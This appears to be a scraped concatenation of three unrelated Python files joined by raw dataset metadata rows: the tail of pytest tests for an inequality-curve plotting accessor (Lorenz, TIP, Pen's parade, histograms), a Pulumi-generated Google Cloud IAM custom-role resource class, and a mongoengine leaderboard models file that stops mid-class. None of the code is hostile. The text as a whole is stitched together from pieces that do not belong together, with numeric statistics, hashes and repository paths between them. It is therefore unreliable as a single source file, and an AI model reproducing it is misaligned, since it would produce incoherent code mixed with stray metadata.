def test_plot_generalized_lorenz(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
test_ax = fig_test.subplots()
ad.plot.lorenz(ax=test_ax, alpha="g")
exp_ax = fig_ref.subplots()
df = ad.plot._lorenz_data(alpha="g")
exp_ax.plot(df.population, df.variable)
exp_ax.plot(df.population, df.line)
exp_ax.set_xlabel("Cumulative % of population")
exp_ax.set_ylabel("Scaled Cumulative % of variable")
exp_ax.set_title("Generalized Lorenz Curve")
@check_figures_equal()
def test_plot_absolute_lorenz(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
test_ax = fig_test.subplots()
ad.plot.lorenz(ax=test_ax, alpha="a")
exp_ax = fig_ref.subplots()
df = ad.plot._lorenz_data(alpha="a")
exp_ax.plot(df.population, df.variable)
exp_ax.plot(df.population, df.line)
exp_ax.set_xlabel("Cumulative % of population")
exp_ax.set_ylabel("Cumulative deviation")
exp_ax.set_title("Absolut Lorenz Curve")
def test_lorenz_invalid_alpha():
ad = datasets.make_uniform(seed=42, size=300)
with pytest.raises(ValueError):
ad.plot.lorenz("j")
with pytest.raises(ValueError):
ad.plot.lorenz("j")
with pytest.raises(ValueError):
ad.plot.lorenz(2)
with pytest.raises(ValueError):
ad.plot.lorenz(0)
@check_figures_equal()
def test_plot_lorenz_axes_None(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
# expected
exp_ax = fig_ref.subplots()
fig_ref.set_size_inches(w=plots.DEFAULT_WIDTH, h=plots.DEFAULT_HEIGHT)
df = ad.plot._lorenz_data(alpha="g")
exp_ax.plot(df.population, df.variable)
exp_ax.plot(df.population, df.line)
exp_ax.set_xlabel("Cumulative % of population")
exp_ax.set_ylabel("Scaled Cumulative % of variable")
exp_ax.set_title("Generalized Lorenz Curve")
# test
test_ax = fig_test.subplots()
with mock.patch("matplotlib.pyplot.gcf", return_value=fig_test):
with mock.patch("matplotlib.pyplot.gca", return_value=test_ax):
ad.plot.lorenz(alpha="g")
# =============================================================================
# TESTS TIP
# =============================================================================
@check_figures_equal()
def test_plot_tip(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
pline = 3
# expected
exp_ax = fig_ref.subplots()
df = ad.plot._tip_data(pline=pline)
exp_ax.plot(df.population, df.variable)
exp_ax.set_title("TIP Curve")
exp_ax.set_ylabel("Cumulated poverty gaps")
exp_ax.set_xlabel("Cumulative % of population")
# exp_ax.legend()
# test
test_ax = fig_test.subplots()
ad.plot.tip(ax=test_ax, pline=pline)
def test_tip_invalid_alpha():
ad = datasets.make_uniform(seed=42, size=300)
with pytest.raises(ValueError):
ad.plot.tip(pline=-2)
with pytest.raises(ValueError):
ad.plot.tip(pline=-0.001)
@check_figures_equal()
def test_plot_tip_axes_None(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
pline = 3
# expected
exp_ax = fig_ref.subplots()
fig_ref.set_size_inches(w=plots.DEFAULT_WIDTH, h=plots.DEFAULT_HEIGHT)
df = ad.plot._tip_data(pline=pline)
exp_ax.plot(df.population, df.variable)
exp_ax.set_title("TIP Curve")
exp_ax.set_ylabel("Cumulated poverty gaps")
exp_ax.set_xlabel("Cumulative % of population")
# exp_ax.legend()
# test
test_ax = fig_test.subplots()
with mock.patch("matplotlib.pyplot.gcf", return_value=fig_test):
with mock.patch("matplotlib.pyplot.gca", return_value=test_ax):
ad.plot.tip(pline=pline)
# =============================================================================
# TESTS PEN
# =============================================================================
@check_figures_equal()
def test_plot_pen(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
pline = 3
# expected
exp_ax = fig_test.subplots()
df, me = ad.plot._pen_data(pline=pline)
exp_ax.plot(df.population, df.variable)
exp_ax.plot(df.population, df.line, label="Mean")
qpl = np.ones(len(df.variable)) * pline / me
exp_ax.plot(df.population, qpl, label="Poverty line")
exp_ax.set_xlabel("Cumulative % of population")
exp_ax.set_ylabel("Medianized variable")
exp_ax.set_title("Pen's Parade")
exp_ax.legend()
# test
test_ax = fig_ref.subplots()
ad.plot.pen(ax=test_ax, pline=pline)
@check_figures_equal()
def test_plot_pen_pline_None(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
# expected
exp_ax = fig_ref.subplots()
df, me = ad.plot._pen_data(pline=None)
exp_ax.plot(df.population, df.variable)
exp_ax.plot(df.population, df.line, label="Mean")
exp_ax.set_xlabel("Cumulative % of population")
exp_ax.set_ylabel("Medianized variable")
exp_ax.set_title("Pen's Parade")
exp_ax.legend()
# test
test_ax = fig_test.subplots()
ad.plot.pen(ax=test_ax, pline=None)
@check_figures_equal()
def test_plot_pen_axes_None(fig_test, fig_ref):
ad = datasets.make_uniform(seed=42, size=300)
pline = 3
# expected
exp_ax = fig_ref.subplots()
fig_ref.set_size_inches(w=plots.DEFAULT_WIDTH, h=plots.DEFAULT_HEIGHT)
df, me = ad.plot._pen_data(pline=pline)
exp_ax.plot(df.population, df.variable)
exp_ax.plot(df.population, df.line, label="Mean")
qpl = np.ones(len(df.variable)) * pline / me
exp_ax.plot(df.population, qpl, label="Poverty line")
exp_ax.set_xlabel("Cumulative % of population")
exp_ax.set_ylabel("Medianized variable")
exp_ax.set_title("Pen's Parade")
exp_ax.legend()
# test
test_ax = fig_test.subplots()
with mock.patch("matplotlib.pyplot.gcf", return_value=fig_test):
with mock.patch("matplotlib.pyplot.gca", return_value=test_ax):
ad.plot.pen(pline=pline)
@check_figures_equal()
def test_plot_pen_axes_None_pline_None(fig_test, fig_ref):
    """Implicit axes and no poverty line: default-size figure, two curves only."""
    ad = datasets.make_uniform(seed=42, size=300)
    # expected: manual rebuild at the library's default figure size
    exp_ax = fig_ref.subplots()
    fig_ref.set_size_inches(w=plots.DEFAULT_WIDTH, h=plots.DEFAULT_HEIGHT)
    df, me = ad.plot._pen_data(pline=None)  # `me` (median) unused when pline is None
    exp_ax.plot(df.population, df.variable)
    exp_ax.plot(df.population, df.line, label="Mean")
    exp_ax.set_xlabel("Cumulative % of population")
    exp_ax.set_ylabel("Medianized variable")
    exp_ax.set_title("Pen's Parade")
    exp_ax.legend()
    # test: patch gcf/gca so the implicit-axes code path lands on fig_test
    test_ax = fig_test.subplots()
    with mock.patch("matplotlib.pyplot.gcf", return_value=fig_test):
        with mock.patch("matplotlib.pyplot.gca", return_value=test_ax):
            ad.plot.pen(pline=None)
# =============================================================================
# TESTS HIST
# =============================================================================
@check_figures_equal()
def test_plot_hist(fig_test, fig_ref):
    """The accessor's hist() matches pandas' DataFrame.plot.hist on the raw data."""
    ad = datasets.make_uniform(seed=42, size=300)
    test_ax = fig_test.subplots()
    ad.plot.hist(ax=test_ax)
    exp_ax = fig_ref.subplots()
    ad.data.plot.hist(ax=exp_ax)  # reference: plot the underlying frame directly
@check_figures_equal()
def test_plot_hist_ax_None(fig_test, fig_ref):
    """hist(ax=None) falls back to the current axes, same as pandas does."""
    ad = datasets.make_uniform(seed=42, size=300)
    # expected: accessor on fig_ref with gcf/gca patched in
    exp_ax = fig_ref.subplots()
    with mock.patch("matplotlib.pyplot.gcf", return_value=fig_ref):
        with mock.patch("matplotlib.pyplot.gca", return_value=exp_ax):
            ad.plot.hist(ax=None)
    # test: pandas plotting on the raw frame under the same patching
    test_ax = fig_test.subplots()
    with mock.patch("matplotlib.pyplot.gcf", return_value=fig_test):
        with mock.patch("matplotlib.pyplot.gca", return_value=test_ax):
            ad.data.plot.hist(ax=None)
@pytest.mark.xfail
def test_hist_isequal():
    """Identity check on the accessor attribute.

    Marked xfail: presumably each ``ad.plot.hist`` attribute access builds a
    fresh bound object, so the identity comparison fails — confirm against the
    accessor implementation.
    """
    ad = datasets.make_uniform(seed=42, size=300)
    assert ad.plot.hist is ad.plot.hist
| 31.736842 | 79 | 0.641376 | 1,366 | 9,648 | 4.284773 | 0.103953 | 0.061507 | 0.041005 | 0.037588 | 0.876986 | 0.865026 | 0.850333 | 0.812746 | 0.77157 | 0.751751 | 0 | 0.012671 | 0.157442 | 9,648 | 303 | 80 | 31.841584 | 0.707344 | 0.127799 | 0 | 0.720812 | 0 | 0 | 0.112836 | 0.03009 | 0 | 0 | 0 | 0 | 0.005076 | 1 | 0.086294 | false | 0 | 0.030457 | 0 | 0.116751 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
77f7b4a0e8e9be5694b4ab39e3072816e01bace3 | 23,690 | py | Python | sdk/python/pulumi_gcp/projects/iam_custom_role.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 121 | 2018-06-18T19:16:42.000Z | 2022-03-31T06:06:48.000Z | sdk/python/pulumi_gcp/projects/iam_custom_role.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 492 | 2018-06-22T19:41:03.000Z | 2022-03-31T15:33:53.000Z | sdk/python/pulumi_gcp/projects/iam_custom_role.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 43 | 2018-06-19T01:43:13.000Z | 2022-03-23T22:43:37.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['IAMCustomRoleArgs', 'IAMCustomRole']
@pulumi.input_type
class IAMCustomRoleArgs:
    def __init__(__self__, *,
                 permissions: pulumi.Input[Sequence[pulumi.Input[str]]],
                 role_id: pulumi.Input[str],
                 title: pulumi.Input[str],
                 description: Optional[pulumi.Input[str]] = None,
                 project: Optional[pulumi.Input[str]] = None,
                 stage: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a IAMCustomRole resource.

        :param pulumi.Input[Sequence[pulumi.Input[str]]] permissions: Names of the permissions this role grants when bound in an IAM policy; at least one is required.
        :param pulumi.Input[str] role_id: Camel-case id for the role; may not contain `-` characters.
        :param pulumi.Input[str] title: Human-readable title for the role.
        :param pulumi.Input[str] description: Human-readable description for the role.
        :param pulumi.Input[str] project: Project the service account will be created in; defaults to the provider project configuration.
        :param pulumi.Input[str] stage: Launch stage of the role, defaulting to `GA`; possible stages are listed [here](https://cloud.google.com/iam/reference/rest/v1/organizations.roles#Role.RoleLaunchStage).
        """
        # Required inputs are always stored.
        pulumi.set(__self__, "permissions", permissions)
        pulumi.set(__self__, "role_id", role_id)
        pulumi.set(__self__, "title", title)
        # Optional inputs are stored only when supplied.
        for prop_name, prop_value in (("description", description),
                                      ("project", project),
                                      ("stage", stage)):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def permissions(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """
        Names of the permissions this role grants when bound in an IAM policy; at least one is required.
        """
        return pulumi.get(self, "permissions")

    @permissions.setter
    def permissions(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "permissions", value)

    @property
    @pulumi.getter(name="roleId")
    def role_id(self) -> pulumi.Input[str]:
        """
        Camel-case id for the role; may not contain `-` characters.
        """
        return pulumi.get(self, "role_id")

    @role_id.setter
    def role_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "role_id", value)

    @property
    @pulumi.getter
    def title(self) -> pulumi.Input[str]:
        """
        Human-readable title for the role.
        """
        return pulumi.get(self, "title")

    @title.setter
    def title(self, value: pulumi.Input[str]):
        pulumi.set(self, "title", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        Human-readable description for the role.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def project(self) -> Optional[pulumi.Input[str]]:
        """
        Project the service account will be created in; defaults to the
        provider project configuration.
        """
        return pulumi.get(self, "project")

    @project.setter
    def project(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project", value)

    @property
    @pulumi.getter
    def stage(self) -> Optional[pulumi.Input[str]]:
        """
        Launch stage of the role, defaulting to `GA`; possible stages are listed
        [here](https://cloud.google.com/iam/reference/rest/v1/organizations.roles#Role.RoleLaunchStage).
        """
        return pulumi.get(self, "stage")

    @stage.setter
    def stage(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "stage", value)
@pulumi.input_type
class _IAMCustomRoleState:
    def __init__(__self__, *,
                 deleted: Optional[pulumi.Input[bool]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 permissions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 project: Optional[pulumi.Input[str]] = None,
                 role_id: Optional[pulumi.Input[str]] = None,
                 stage: Optional[pulumi.Input[str]] = None,
                 title: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering IAMCustomRole resources.

        :param pulumi.Input[bool] deleted: (Optional) Current deleted state of the role.
        :param pulumi.Input[str] description: Human-readable description for the role.
        :param pulumi.Input[str] name: Role name in the `projects/{{project}}/roles/{{role_id}}` format; like `id`, usable as a reference from other resources such as IAM role bindings.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] permissions: Names of the permissions this role grants when bound in an IAM policy; at least one is required.
        :param pulumi.Input[str] project: Project the service account will be created in; defaults to the provider project configuration.
        :param pulumi.Input[str] role_id: Camel-case id for the role; may not contain `-` characters.
        :param pulumi.Input[str] stage: Launch stage of the role, defaulting to `GA`; possible stages are listed [here](https://cloud.google.com/iam/reference/rest/v1/organizations.roles#Role.RoleLaunchStage).
        :param pulumi.Input[str] title: Human-readable title for the role.
        """
        # Every state input is optional; store only the ones actually given.
        for prop_name, prop_value in (("deleted", deleted),
                                      ("description", description),
                                      ("name", name),
                                      ("permissions", permissions),
                                      ("project", project),
                                      ("role_id", role_id),
                                      ("stage", stage),
                                      ("title", title)):
            if prop_value is not None:
                pulumi.set(__self__, prop_name, prop_value)

    @property
    @pulumi.getter
    def deleted(self) -> Optional[pulumi.Input[bool]]:
        """
        (Optional) Current deleted state of the role.
        """
        return pulumi.get(self, "deleted")

    @deleted.setter
    def deleted(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "deleted", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        Human-readable description for the role.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Role name in the `projects/{{project}}/roles/{{role_id}}` format; like
        `id`, usable as a reference from other resources such as IAM role bindings.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def permissions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Names of the permissions this role grants when bound in an IAM policy;
        at least one is required.
        """
        return pulumi.get(self, "permissions")

    @permissions.setter
    def permissions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "permissions", value)

    @property
    @pulumi.getter
    def project(self) -> Optional[pulumi.Input[str]]:
        """
        Project the service account will be created in; defaults to the
        provider project configuration.
        """
        return pulumi.get(self, "project")

    @project.setter
    def project(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project", value)

    @property
    @pulumi.getter(name="roleId")
    def role_id(self) -> Optional[pulumi.Input[str]]:
        """
        Camel-case id for the role; may not contain `-` characters.
        """
        return pulumi.get(self, "role_id")

    @role_id.setter
    def role_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "role_id", value)

    @property
    @pulumi.getter
    def stage(self) -> Optional[pulumi.Input[str]]:
        """
        Launch stage of the role, defaulting to `GA`; possible stages are listed
        [here](https://cloud.google.com/iam/reference/rest/v1/organizations.roles#Role.RoleLaunchStage).
        """
        return pulumi.get(self, "stage")

    @stage.setter
    def stage(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "stage", value)

    @property
    @pulumi.getter
    def title(self) -> Optional[pulumi.Input[str]]:
        """
        Human-readable title for the role.
        """
        return pulumi.get(self, "title")

    @title.setter
    def title(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "title", value)
class IAMCustomRole(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 permissions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 project: Optional[pulumi.Input[str]] = None,
                 role_id: Optional[pulumi.Input[str]] = None,
                 stage: Optional[pulumi.Input[str]] = None,
                 title: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages a customized Cloud IAM project role. For more information see
        [the official documentation](https://cloud.google.com/iam/docs/understanding-custom-roles)
        and the [API](https://cloud.google.com/iam/reference/rest/v1/projects.roles).

        > **Warning:** GCP custom roles are soft-deleted. Creating a role may
        therefore undelete-and-update an existing role with the same name,
        which can be confusing. A deleted role is permanently removed after 7
        days, but its name can stay unavailable for up to 30 more days (i.e.
        between 7 and 37 days after deletion); a role deleted for more than 7
        days can no longer be changed at all by the provider.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_gcp as gcp

        my_custom_role = gcp.projects.IAMCustomRole("my-custom-role",
            description="A description",
            permissions=[
                "iam.roles.list",
                "iam.roles.create",
                "iam.roles.delete",
            ],
            role_id="myCustomRole",
            title="My Custom Role")
        ```

        ## Import

        Custom Roles can be imported using any of these accepted formats:

        ```sh
        $ pulumi import gcp:projects/iAMCustomRole:IAMCustomRole default projects/{{project}}/roles/{{role_id}}
        ```

        ```sh
        $ pulumi import gcp:projects/iAMCustomRole:IAMCustomRole default {{project}}/{{role_id}}
        ```

        ```sh
        $ pulumi import gcp:projects/iAMCustomRole:IAMCustomRole default {{role_id}}
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: Human-readable description for the role.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] permissions: Names of the permissions this role grants when bound in an IAM policy; at least one is required.
        :param pulumi.Input[str] project: Project the service account will be created in; defaults to the provider project configuration.
        :param pulumi.Input[str] role_id: Camel-case id for the role; may not contain `-` characters.
        :param pulumi.Input[str] stage: Launch stage of the role, defaulting to `GA`; possible stages are listed [here](https://cloud.google.com/iam/reference/rest/v1/organizations.roles#Role.RoleLaunchStage).
        :param pulumi.Input[str] title: Human-readable title for the role.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: IAMCustomRoleArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a customized Cloud IAM project role; see the keyword-argument
        overload above for the full description, example usage, import formats
        and the soft-delete warning.

        :param str resource_name: The name of the resource.
        :param IAMCustomRoleArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads: an IAMCustomRoleArgs bundle or
        # plain keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(IAMCustomRoleArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is None:
            __self__._internal_init(resource_name, *args, **kwargs)
        else:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 permissions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 project: Optional[pulumi.Input[str]] = None,
                 role_id: Optional[pulumi.Input[str]] = None,
                 stage: Optional[pulumi.Input[str]] = None,
                 title: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        # Normalize and validate the resource options.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource: build the property bag from arguments.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = IAMCustomRoleArgs.__new__(IAMCustomRoleArgs)
            # Required properties (unless adopting via urn) — checked in the
            # same order as before so the first error raised is unchanged.
            for required_name, required_value in (("permissions", permissions),
                                                  ("role_id", role_id),
                                                  ("title", title)):
                if required_value is None and not opts.urn:
                    raise TypeError(f"Missing required property '{required_name}'")
            props = __props__.__dict__
            props["description"] = description
            props["permissions"] = permissions
            props["project"] = project
            props["role_id"] = role_id
            props["stage"] = stage
            props["title"] = title
            # Output-only properties start unset.
            props["deleted"] = None
            props["name"] = None
        super(IAMCustomRole, __self__).__init__(
            'gcp:projects/iAMCustomRole:IAMCustomRole',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            deleted: Optional[pulumi.Input[bool]] = None,
            description: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            permissions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            project: Optional[pulumi.Input[str]] = None,
            role_id: Optional[pulumi.Input[str]] = None,
            stage: Optional[pulumi.Input[str]] = None,
            title: Optional[pulumi.Input[str]] = None) -> 'IAMCustomRole':
        """
        Get an existing IAMCustomRole resource's state with the given name, id,
        and optional extra properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] deleted: (Optional) Current deleted state of the role.
        :param pulumi.Input[str] description: Human-readable description for the role.
        :param pulumi.Input[str] name: Role name in the `projects/{{project}}/roles/{{role_id}}` format; like `id`, usable as a reference from other resources such as IAM role bindings.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] permissions: Names of the permissions this role grants when bound in an IAM policy; at least one is required.
        :param pulumi.Input[str] project: Project the service account will be created in; defaults to the provider project configuration.
        :param pulumi.Input[str] role_id: Camel-case id for the role; may not contain `-` characters.
        :param pulumi.Input[str] stage: Launch stage of the role, defaulting to `GA`; possible stages are listed [here](https://cloud.google.com/iam/reference/rest/v1/organizations.roles#Role.RoleLaunchStage).
        :param pulumi.Input[str] title: Human-readable title for the role.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _IAMCustomRoleState.__new__(_IAMCustomRoleState)
        state = __props__.__dict__
        state["deleted"] = deleted
        state["description"] = description
        state["name"] = name
        state["permissions"] = permissions
        state["project"] = project
        state["role_id"] = role_id
        state["stage"] = stage
        state["title"] = title
        return IAMCustomRole(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def deleted(self) -> pulumi.Output[bool]:
        """
        (Optional) Current deleted state of the role.
        """
        return pulumi.get(self, "deleted")

    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[Optional[str]]:
        """
        Human-readable description for the role.
        """
        return pulumi.get(self, "description")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Role name in the `projects/{{project}}/roles/{{role_id}}` format; like
        `id`, usable as a reference from other resources such as IAM role bindings.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def permissions(self) -> pulumi.Output[Sequence[str]]:
        """
        Names of the permissions this role grants when bound in an IAM policy;
        at least one is required.
        """
        return pulumi.get(self, "permissions")

    @property
    @pulumi.getter
    def project(self) -> pulumi.Output[str]:
        """
        Project the service account will be created in; defaults to the
        provider project configuration.
        """
        return pulumi.get(self, "project")

    @property
    @pulumi.getter(name="roleId")
    def role_id(self) -> pulumi.Output[str]:
        """
        Camel-case id for the role; may not contain `-` characters.
        """
        return pulumi.get(self, "role_id")

    @property
    @pulumi.getter
    def stage(self) -> pulumi.Output[Optional[str]]:
        """
        Launch stage of the role, defaulting to `GA`; possible stages are listed
        [here](https://cloud.google.com/iam/reference/rest/v1/organizations.roles#Role.RoleLaunchStage).
        """
        return pulumi.get(self, "stage")

    @property
    @pulumi.getter
    def title(self) -> pulumi.Output[str]:
        """
        Human-readable title for the role.
        """
        return pulumi.get(self, "title")
| 42.83906 | 210 | 0.631828 | 2,861 | 23,690 | 5.099266 | 0.090528 | 0.080677 | 0.082528 | 0.064843 | 0.860717 | 0.836589 | 0.803756 | 0.783056 | 0.768456 | 0.762492 | 0 | 0.001608 | 0.264795 | 23,690 | 552 | 211 | 42.916667 | 0.836022 | 0.431659 | 0 | 0.664179 | 1 | 0 | 0.071519 | 0.003386 | 0 | 0 | 0 | 0 | 0 | 1 | 0.160448 | false | 0.003731 | 0.018657 | 0 | 0.276119 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ae00726a2d5285febe97ce79d80fabc440a0c6b9 | 3,761 | py | Python | app/customer/models/rank.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | 2 | 2017-12-02T13:58:30.000Z | 2018-08-02T17:07:59.000Z | app/customer/models/rank.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | null | null | null | app/customer/models/rank.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
from django.db import models
from mongoengine import *
from base.settings import CHATPAMONGO
class CharmRank(Document):
    """Charm-value leaderboard entry for an anchor (host)."""

    # (code, label) choices for ``change_status``: 0 = unchanged, 1 = up, 2 = down.
    CHANGE = [
        (0, u"不变"),
        (1, u"上升"),
        (2, u"下降"),
    ]

    user = GenericReferenceField("User", verbose_name=u'用户')  # ranked user
    charm = IntField(verbose_name=u"主播近三天魅力值")  # charm earned over the last 3 days
    change_status = IntField(verbose_name=u"较上次位置变化情况")  # movement vs. previous ranking
    type = IntField(verbose_name=u"榜单类型")  # leaderboard type
    rank = IntField(verbose_name=u"当前排名", default=0)  # current position (0 = unranked)

    @classmethod
    def get_rank_list(cls, interval, count):
        """Return entries ranked at or above ``count``.

        The first parameter of a classmethod is the class itself, so it is
        named ``cls`` (it was previously misnamed ``self``). ``interval`` is
        accepted for caller compatibility but currently unused.
        """
        return cls.objects.filter(rank__lte=count)
class WealthRank(Document):
    """Wealth-value leaderboard entry for a regular user."""

    # (code, label) choices for ``change_status``: 0 = unchanged, 1 = up, 2 = down.
    CHANGE = [
        (0, u"不变"),
        (1, u"上升"),
        (2, u"下降"),
    ]

    user = GenericReferenceField("User", verbose_name=u'用户')  # ranked user
    wealth = IntField(verbose_name=u"用户近三天财富值")  # wealth accumulated over the last 3 days
    change_status = IntField(verbose_name=u"较上次位置变化情况")  # movement vs. previous ranking
    rank = IntField(verbose_name=u"当前排名")  # current position
    type = IntField(verbose_name=u"榜单类型")  # leaderboard type: 1 = weekly, 2 = daily

    @classmethod
    def get_rank_list(cls, interval, count):
        """Return entries ranked at or above ``count``.

        First parameter renamed ``self`` -> ``cls`` (this is a classmethod).
        ``interval`` is accepted for caller compatibility but currently unused.
        """
        return cls.objects.filter(rank__lte=count)
class InviteRank(Document):
    """
    For the May 13 -- May 26 campaign: shows the five users who invited the
    most people.
    """
    head_image = StringField(verbose_name=u"用户头像")  # inviter's avatar
    nickname = StringField(verbose_name=u"用户昵称")  # display name
    uid = IntField(verbose_name=u"用户长id")  # long user id
    invite_num = IntField(verbose_name=u"邀请人数")  # number of users invited
    rank = IntField(verbose_name=u"邀请排行")  # position on the invite leaderboard

    @classmethod
    def get_top_5(cls):
        # NOTE(review): returns every document; presumably the collection only
        # ever holds the top five entries — confirm against the writer side.
        return InviteRank.objects.all()
class InviteRankTwo(Document):
    """
    For the May 20 -- May 26 campaign: shows the five users who invited the
    most people.
    """
    head_image = StringField(verbose_name=u"用户头像")  # inviter's avatar
    nickname = StringField(verbose_name=u"用户昵称")  # display name
    uid = IntField(verbose_name=u"用户长id")  # long user id
    invite_num = IntField(verbose_name=u"邀请人数")  # number of users invited
    rank = IntField(verbose_name=u"邀请排行")  # position on the invite leaderboard

    @classmethod
    def get_top_5(cls):
        # NOTE(review): returns every document; presumably the collection only
        # ever holds the top five entries — confirm against the writer side.
        return InviteRankTwo.objects.all()
class NewAnchorRank(Document):
    """
    "New anchor arrivals" list: stores only the id of each featured newcomer.
    """
    user_id = IntField(verbose_name=u"用户id")  # id of the featured user
class ClairvoyantRank(Document):
    """Membership list identified only by user id ("clairvoyant" feature)."""
    user_id = IntField(verbose_name=u"用户id")  # id of the listed user
class CharmRankNew(Document):
    """Charm leaderboard entry (newer variant supporting weekly/daily boards)."""

    # (code, label) choices for ``change_status``: 0 = unchanged, 1 = up, 2 = down.
    CHANGE = [
        (0, u"不变"),
        (1, u"上升"),
        (2, u"下降"),
    ]

    user = GenericReferenceField("User", verbose_name=u'用户')  # ranked user
